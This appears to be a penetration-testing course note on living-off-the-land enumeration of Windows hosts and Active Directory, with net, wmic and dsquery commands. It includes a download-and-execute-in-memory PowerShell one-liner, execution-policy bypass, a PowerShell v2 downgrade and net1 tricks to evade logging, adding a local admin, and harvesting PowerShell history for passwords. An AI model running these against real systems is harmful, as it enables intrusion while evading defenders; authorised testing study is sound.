Living Off the Land

What if we cannot get an attack host, or upload our tools into a host.

Here are some basic enumeration commands:

hostname

Prints the PC's Name

[System.Environment]::OSVersion.Version

Prints out the OS version and revision level

wmic qfe get Caption,Description,HotFixID,InstalledOn

Prints the patches and hotfixes applied to the host

ipconfig /all

Prints out network adapter state and configurations

set

Displays a list of environment variables for the current session (ran from CMD-prompt)

echo %USERDOMAIN%

Displays the domain name to which the host belongs (ran from CMD-prompt)

echo %logonserver%

Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)

We can also use systeminfo command which gives us all in a single command.

PowerShell

Get-Module

Lists available modules loaded for use.

Get-ExecutionPolicy -List

Will print the execution policy settings for each scope on a host.

Set-ExecutionPolicy Bypass -Scope Process

This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.

Get-ChildItem Env: | ft Key,Value

Return environment values such as key paths, users, computer information, etc.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

This is a quick and easy way to download a file from the web using PowerShell and call it from memory.

Many defenders are unaware that several versions of PowerShell often exist on a host. If not uninstalled, they can still be used. Powershell event logging was introduced as a feature with Powershell 3.0 and forward. With that in mind, we can attempt to call Powershell version 2.0 or older. If successful, our actions from the shell will not be logged in Event Viewer. We can downgrade PowerShell using:

powershell.exe -version 2

Note: The primary place to look is in the PowerShell Operational Log found under Applications and Services Logs > Microsoft > Windows > PowerShell > Operational. All commands executed in our session will log to this file. The Windows PowerShell log located at Applications and Services Logs > Windows PowerShell is also a good place to check. An entry will be made here when we start an instance of PowerShell.

Note: With Script Block Logging enabled, we can see that whatever we type into the terminal gets sent to this log. If we downgrade to PowerShell V2, this will no longer function correctly. Our actions after will be masked since Script Block Logging does not work below PowerShell 3.0. Notice above in the logs that we can see the commands we issued during a normal shell session, but it stopped after starting a new PowerShell instance in version 2. Be aware that the action of issuing the command powershell.exe -version 2 within the PowerShell session will be logged!

Note: Event ID 400 indicates when a new PowerShell host process has started.

Firewall Checks

Checking the Windows Firewall settings and status of Windows Defender using the netsh and sc utilities:

netsh advfirewall show allprofiles

We can check status of Windows Defender from CMD:

sc query windefend

We can also check the status and configuration settings of Defender:

Get-MpComputerStatus

It will show what revision our AV settings are at and what settings are enabled/disabled. We can tell how often scans are run, if the on-demand threat alerting is active, and more.

Are we alone?

Use the command to check if others are logged on to this host:

qwinsta

Network Enumeration

arp -a

Lists all known hosts stored in the arp table.

ipconfig /all

Prints out adapter settings for the host. We can figure out the network segment from here.

route print

Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.

netsh advfirewall show state

Displays the status of the host's firewall. We can determine if it is active and filtering traffic.

The arp -a and route print commands are specially useful during black box testing where we have limited our scans. These commands will show us what resources our host is aware of and it can be used for lateral movement.

Windows Management Instrumentation (WMI)

Windows Management Instrumentation (WMI) is a scripting engine that is widely used within Windows enterprise environments to retrieve information and run administrative tasks on local and remote hosts. Here are some WMI quick checks:

wmic qfe get Caption,Description,HotFixID,InstalledOn

Prints the patch level and description of the Hotfixes applied

wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List

Displays basic host information to include any attributes within the list

wmic process list /format:list

A listing of all processes on host

wmic ntdomain list /format:list

Displays information about the Domain and Domain Controllers

wmic useraccount list /format:list

Displays information about all local accounts and any domain accounts that have logged into the device

wmic group list /format:list

Information about all local groups

wmic sysaccount list /format:list

Dumps information about any system accounts that are being used as service accounts.

We can print the information about the domain and the child domain, and the external forest that our current domain has trust with.

wmic ntdomain get Caption,Description,DnsForestName,DomainName,DomainControllerAddress

This cheatsheet has some useful commands for querying host and domain info using wmic.

Net.exe

Keep in mind that net.exe commands are typically monitored by EDR solutions and can quickly give up our location if our assessment has an evasive component.

net accounts

Information about password requirements

net accounts /domain

Password and lockout policy

net group /domain

Information about domain groups

net group "Domain Admins" /domain

List users with domain admin privileges

net group "domain computers" /domain

List of PCs connected to the domain

net group "Domain Controllers" /domain

List PC accounts of domains controllers

net group <domain_group_name> /domain

User that belongs to the group

net groups /domain

List of domain groups

net localgroup

All available groups

net localgroup administrators /domain

List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)

net localgroup Administrators

Information about a group (admins)

net localgroup administrators [username] /add

Add user to administrators

net share

Check current shares

net user <ACCOUNT_NAME> /domain

Get information about a user within the domain

net user /domain

List all users of the domain

net user %username%

Information about the current user

net use x: \computer\share

Mount the share locally

net view

Get a list of computers

net view /all /domain[:domainname]

Shares on the domains

net view \computer /ALL

List shares of a computer

net view /domain

List of PCs of the domain

Note: If you believe the network defenders are actively logging/looking for any commands out of the normal, you can try this workaround to using net commands. Typing net1 instead of net will execute the same functions without the potential trigger from the net string.

Note: this is a useful command net group "Domain Admins" /domain.

We can then search to get information about each users and if they are active or not using net user <username> /domain

Dsquery

dsquery will exist on any host with the Active Directory Domain Services Role installed, and the dsquery DLL exists on all modern Windows systems by default now and can be found at C:\Windows\System32\dsquery.dll. This is useful to query objects in AD.

But to run that we need elevated privilege on the host or run PowerShell from a SYSTEM context. Here are some commands:

# user search
dsquery user

# computer search
dsquery computer

Or we can use Wildcard to list all the objects in OU.

dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

We can, of course, combine dsquery with LDAP search filters of our choosing. The below looks for users with the PASSWD_NOTREQD flag set in the userAccountControl attribute:

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl

This following command will list all domain controllers in the current domain limiting to 5 results:

dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName

LDAP Filtering Explained

You will notice in the queries above that we are using strings such as userAccountControl:1.2.840.113556.1.4.803:=8192. These strings are common LDAP queries that can be used with several different tools too, including AD PowerShell, ldapsearch, and many others. Let's break them down quickly:

userAccountControl:1.2.840.113556.1.4.803: Specifies that we are looking at the User Account Control (UAC) attributes for an object. This portion can change to include three different values we will explain below when searching for information in AD (also known as Object Identifiers (OIDs). =8192 represents the decimal bitmask we want to match in this search. This decimal number corresponds to a corresponding UAC Attribute flag that determines if an attribute like password is not required or account is locked is set. These values can compound and make multiple different bit entries. Below is a quick list of potential values.

OID match strings

OIDs are rules used to match bit values with attributes, as seen above. For LDAP and AD, there are three main matching rules:

1.2.840.113556.1.4.803

When using this rule as we did in the example above, we are saying the bit value must match completely to meet the search requirements. Great for matching a singular attribute.

1.2.840.113556.1.4.804

When using this rule, we are saying that we want our results to show any attribute match if any bit in the chain matches. This works in the case of an object having multiple attributes set.

1.2.840.113556.1.4.1941

This rule is used to match filters that apply to the Distinguished Name of an object and will search through all ownership and membership entries.

PreviousCredentialed Enumeration - from Windows NextKerberoasting

Last updated 1 year ago

Was this helpful?